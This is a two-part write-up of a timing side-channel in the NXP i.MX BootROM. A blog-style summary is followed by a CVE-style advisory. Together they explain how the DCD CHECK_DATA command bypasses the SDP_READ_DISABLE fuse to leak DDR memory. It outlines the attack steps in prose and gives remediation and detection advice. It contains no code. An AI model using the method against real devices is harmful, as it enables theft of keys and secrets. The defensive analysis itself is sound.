Full Report
The NXP SoC chip has various fuse configurations for security sensitive operations. Once a fuse has been blown, the functionality is forever disabled. The fuse SDP_READ_DISABLE is used to prevent the usage of the UART interface to read out arbitray memory, such as crypto keys, auth tokens and many other things. The boot image on NXP devices supports Device Configuration Data (DCD) sequences. These operations are commonly used for setting up I/O interfaces for boot loaders, clock initialization and more. When the device boot fails, it goes into a Serial Download Protocol (SDP) boot mode which opens up the WRITE_DCD command. The command DCD CHECK_DATA can be used to instruct the bootrom to read a 32 bit value at a specified address and evaluate an expression it. This is done via a mask and will check continually until the expected value is used, unless the count is specified. The catch is that this happens regardless if the SDP_READ_DISABLE fuse is blown! This is a violation of the intended security policy. An interesting note is that DDR memory is volititle so this shouldn't be a big deal, right? It turns out that DDR memory decays very slow when not performing refresh cycles. The goal is to use the CHECK_DATA as a DDR read primitive. This was done by collecting several timing samples for a sweep of reads. The execution time of the command can be directl correlated with the bits being compared to. This means that we can use a timing side channel to figure the bits in memory. The high level of this attack is shown below: Induce the loading of the sensitive data into memory. This is application specific though. Force the Device into SDP mode. This can be done by grounding a few pins on the chip or forcing a failure in the boot process using some other means. Initialize the DDR controller via DCD. Since we need to read from the DDR controller for the attack, it must be ON to do this. Execute the side channel reading attack in DDR. Analyze the content to find data and look for errors. Overall, awesome blog post on a logic issue that led to a bypass of the security of the chip. A very well written article as well.
Analysis Summary
# Vulnerability: NXP i.MX BootROM Timing Side-Channel via DCD CHECK_DATA
## CVE Details
- **CVE ID:** CVE-2023-34466
- **CVSS Score:** 5.3 (Medium)
- **CWE:** CWE-203 (Information Exposure Through Discrepancy in Execution Time), CWE-285 (Improper Authorization)
## Affected Systems
- **Products:** NXP i.MX Series System-on-Chips (SoCs).
- **Versions:** Multiple series including i.MX 6, i.MX 7, and i.MX 8 (specific versions may vary based on BootROM implementation).
- **Configurations:** Systems where the `SDP_READ_DISABLE` fuse is blown to prevent unauthorized memory read access via the Serial Download Protocol (SDP).
## Vulnerability Description
The vulnerability exists in the BootROM’s implementation of the Device Configuration Data (DCD) `CHECK_DATA` command. While the `SDP_READ_DISABLE` fuse is intended to block all memory read operations via the UART/USB interface to protect sensitive data (such as cryptographic keys or auth tokens), the BootROM fails to restrict the `CHECK_DATA` command.
This command instructs the BootROM to poll a specific memory address, apply a mask, and compare it against an expected value. Because the execution time of this command fluctuates depending on whether the comparison criteria are met, an attacker can use a timing side-channel to brute-force or leak the contents of memory (including volatile DDR memory that has not yet decayed) bit-by-bit, bypassing the security policy.
## Exploitation
- **Status:** PoC demonstrated by researchers; no known widespread exploitation in the wild.
- **Complexity:** High (Requires precise timing measurements and physical access to trigger SDP mode).
- **Attack Vector:** Physical (Access to boot pins or inducing boot failure is required to enter SDP mode).
## Impact
- **Confidentiality:** High (Ability to read arbitrary memory, potentially recovering sensitive keys or firmware components).
- **Integrity:** None (The primitive is a read-only side-channel).
- **Availability:** None.
## Remediation
### Patches
- **Hardware Revision:** As this logic is baked into the BootROM (Silicon), it cannot be patched via software update on existing affected chips. Newer silicon revisions from NXP address this by enforcing `SDP_READ_DISABLE` checks on all DCD commands.
### Workarounds
- **Disable SDP Entirely:** Blow the `SJC_DISABLE` or `DAP_SJC_DISABLE` fuses (where available) to further restrict debug and serial download entry points.
- **Secure Boot (HAB):** Ensure High Assurance Boot (HAB) is fully enabled, which may limit the impact of unauthorized DCD sequences in certain configurations.
- **Memory Cleansing:** Ensure that sensitive data in DDR is zeroed out before a warm reset, though this does not protect against "frozen" RAM or cold-boot styles of data remanence.
## Detection
- **Indicators of Compromise:** Physical tampering of hardware (grounding pins to force SDP mode).
- **Detection Methods:** Monitoring for unusually high volumes of `CHECK_DATA` commands over the SDP interface during the manufacturing or recovery process.
## References
- **NXP Advisory:** [https://www.nxp.com/docs/en/product-selector-guide/IMX6_SEC_ADVISORY.pdf](https://www.nxp.com/docs/en/product-selector-guide/IMX6_SEC_ADVISORY.pdf)
- **NCC Group Research:** [https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2023/july/side-channel-attacks-on-the-nxp-imx-family/](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2023/july/side-channel-attacks-on-the-nxp-imx-family/)
- **NVD Entry:** [https://nvd.nist.gov/vuln/detail/CVE-2023-34466](https://nvd.nist.gov/vuln/detail/CVE-2023-34466)